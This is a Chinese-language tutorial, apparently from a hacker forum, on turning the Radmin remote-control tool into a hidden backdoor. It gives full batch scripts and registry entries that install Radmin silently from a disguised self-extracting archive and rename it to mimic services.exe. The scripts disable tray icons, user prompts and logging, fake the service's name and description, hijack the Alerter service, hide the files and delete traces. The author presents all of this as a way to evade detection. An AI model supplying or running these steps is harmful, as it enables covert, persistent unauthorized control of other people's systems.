问一些高手，都说用的radmin，一个很重要的原因就是它不被杀毒软件查杀，而且速度非常快，界面也是简洁美观，可以说是高手的最爱，（什么？没听说过？那就不用看了！）就是缺少一个反向连接的功能，但是对于我们控制服务器来说，反向连接也是多余的，今天我给大家带来一个radmin的智能化一键安装成新的服务或者替换成系统已有的服务，这样做的好处当然是谁都知道――进程不会被简单地kill掉，而且不用担心开机自启动的问题。好，废话不多说，现在就来开工。
首先配置服务端，很简单的几个设置，这里我用的是影子汉化版3.2，隐藏任务栏图标是肯定的了，改端口为2046（这个电影我至今看不懂，所以就用它了），如图一

好了，这样就生成了r_server这个服务端，双击执行这里是没有效果的，不信你可以试试，我们需要在命令行下把它安装成服务，但是它默认的服务名称和显示名称分别是r_server和remote administrator service并且没有服务的描述，双击服务会看到进程所在的路径，如图二，三

同时在任务管理器下radmin的进程r_server会显得很刺眼。
思路是这样的，用rar的自解压包将radmin的相关文件解压到系统目录，然后用批处理将radmin安装成服务，并且改名，最后删掉痕迹，是不是很爽啊！
Radmin的服务安装在注册表中有2个地方，分别在[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]和[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\r_server]

 
再如图四把radmin改名为一个系统进程名，我这里用的是services，因为服务名将来也要显示在进程中的，所以起个和系统进程名一样的名字，只是真正的services在system32目录下，我换个目录，在system32\WBEM\。radmin运行需要raddrv.dll和admdll.dll这两个动态链接库的支持，sc用来改服务描述名，2.bat 就是批处理了。我们将这五个文件做成一个自解压包，并让它自解压到%systemroot%\system32\WBEM目录下，%systemroot%顾名思义是系统目录，用来适应不同的操作系统，然后在高级自解压选项里的常规选项卡的解压后运行中填上主角批处理文件，如图五

在模式选项卡的安静模式选全部隐藏，覆盖方式选择覆盖所有文件，如图六

 
图标可以自己改一个，我就不说了。
再来说批处理，在radmin的配置界面安装服务，然后将[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]主键导出，接着把它用批处理命令写入server.reg这个自己建立的注册表文件中，注意关闭回显。这之前先把services注册成服务，注意选择安静模式，这样注册的问题在于没有了[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]主键的配置信息，所以我们才要后来补上。
@echo off
@services.exe /install /silence
echo Windows Registry Editor Version 5.00 > c:\server.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]>> c:\server.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]>> c:\server.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]>> c:\server.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist]>> c:\server.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]>> c:\server.reg
echo "Port"=hex:fe,07,00,00>> c:\server.reg
echo "Timeout"=hex:0a,00,00,00>> c:\server.reg
echo "EnableLogFile"=hex:00,00,00,00>> c:\server.reg
echo "LogFilePath"="c:\\logfile.txt">> c:\server.reg
echo "FilterIp"=hex:00,00,00,00>> c:\server.reg
echo "DisableTrayIcon"=hex:01,00,00,00>> c:\server.reg
echo "AutoAllow"=hex:00,00,00,00>> c:\server.reg
echo "AskUser"=hex:00,00,00,00>> c:\server.reg
echo "EnableEventLog"=hex:00,00,00,00>> c:\server.reg
echo "NTAuthId"=hex:02,00,00,00>> c:\server.reg
echo "NTAuthEnabled"=hex:00,00,00,00>> c:\server.reg
echo "Parameter"=hex:0d,6f,92,ce,c2,9c,9f,0a,fb,6a,6a,54,65,15,3e,53>> c:\server.reg>>
@regedit /s c:\server.reg

写完后用@regedit /s c:\server.reg 这个语句安静地将我们写好的注册表文件导入
@net start r_server
@attrib +r +h +s %systemroot%\system32\WBEM\services.exe
@attrib +r +h +s %systemroot%\system32\WBEM\Admdll.dll
@attrib +r +h +s %systemroot%\system32\WBEM\raddrv.dll

接着启动r_server服务，因为默认安装的服务名是r_server，启动之后才能改它的显示名称。还做了一个工作就是加了只读，系统和隐藏属性，这步工作你可以做，也可以不做。
下面来改注册表的描述名称：
echo Windows Registry Editor Version 5.00 > c:\ip.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\r_server] >> c:\ip.reg
echo "Description"="动态数据交换的网络传输的管理服务。">> c:\ip.reg
@regedit /s c:\ip.reg

是不是很具有诱惑力？
接着是改显示名称和一些扫尾工作

@del c:\ip.reg /f /q
@del c:\server.reg /f /q
@sc config r_server displayname= "Network DDE Management"
@del %systemroot%\system32\WBEM\sc.exe /f /q
@del %systemroot%\system32\WBEM\2.bat /f /q

显示名称要用到sc，用写注册表的方法是行不通的，我试过了，注意sc的用法，不会地可以查资料。我起的显示名称是不是同样具有诱惑力？哈哈!奸笑中……
试着运行一下那个可爱的自解压文件（因为换了图标，所以很像普通的可执行文件），会蹦出cmd窗口运行一会儿，不小心看一下就过去了，当然这也是有待改进的地方，本人材疏学浅，哪位高人如果能作出了不闪的效果不要忘了跟我说一声哦！调出任务管理器，可以看到有2个services，结束试试？都是关键进程，哈哈，目的达到了。你不是一直都想要做一个不容易被结束的进程吗？服务是一个很好的选择哦！
这里只是做了一个示范，大家看懂了之后可以尽你的想象力自由发挥，做一个说不定连我都会被忽悠过去的服务哦！
接着再来做替换服务，以Alerter为例吧，Alerter服务提供系统管理级警报的服务，不开也没什么太大影响，而且默认是自启动的哦！实际上我们将安装好后的radmin服务的配置替换alter的配置就可以了，这是我试验后得出的结论。接着上面的，把[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\r_server]键值导出，这里取名叫alerter.reg，那么我们的批处理就是这么写了：
@echo off
echo Windows Registry Editor Version 5.00 > c:\server.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]>> c:\server.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]>> c:\server.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]>> c:\server.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist]>> c:\server.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]>> c:\server.reg
echo "Port"=hex:fe,07,00,00>> c:\server.reg
echo "Timeout"=hex:0a,00,00,00>> c:\server.reg
echo "EnableLogFile"=hex:00,00,00,00>> c:\server.reg
echo "LogFilePath"="c:\\logfile.txt">> c:\server.reg
echo "FilterIp"=hex:00,00,00,00>> c:\server.reg
echo "DisableTrayIcon"=hex:01,00,00,00>> c:\server.reg
echo "AutoAllow"=hex:00,00,00,00>> c:\server.reg
echo "AskUser"=hex:00,00,00,00>> c:\server.reg
echo "EnableEventLog"=hex:00,00,00,00>> c:\server.reg
echo "NTAuthId"=hex:02,00,00,00>> c:\server.reg
echo "NTAuthEnabled"=hex:00,00,00,00>> c:\server.reg
echo "Parameter"=hex:0d,6f,92,ce,c2,9c,9f,0a,fb,6a,6a,54,65,15,3e,53>> c:\server.reg
@regedit /s c:\server.reg
@regedit /s %systemroot%\system32\WBEM\alerter.reg
@attrib +r +h +s %systemroot%\system32\WBEM\services.exe
@attrib +r +h +s %systemroot%\system32\WBEM\Admdll.dll
@attrib +r +h +s %systemroot%\system32\WBEM\raddrv.dll
@del c:\server.reg /f /q
@del %systemroot%\system32\WBEM\alerter.reg /f /q
@del %systemroot%\system32\WBEM\3.bat /f /q
我就不麻烦将这两个注册表文件用写入的方法导入了，效果是一样的。记得在做自解压的时候把alerter.reg包进去，其余还是一样。这种方法效果同样是一闪而过了，不过速度更快些，更不容易被发觉(因为之前的那个需要启动radmin服务)。再看看服务项里，Alerter还是那个Alerter，可是运行的程序可就不是services.exe了，这一招偷梁换柱不细看还真是不容易被发现哦！注意替换之后重启才会生效，如果你嫌麻烦可以加一个net start，但是这样会使cmd窗口停止的时间更长，为了长久之计，忍一时无所谓拉！
其实本文只是一个抛砖，实际上利用好了是很灵活的哦！同时运用在编程上也是很好的一种思路，就等着各位看客的玉出来了！
好了，替换服务就是这么简单了，你还等什么？赶快行动啊！
注：本测试在2000server上通过。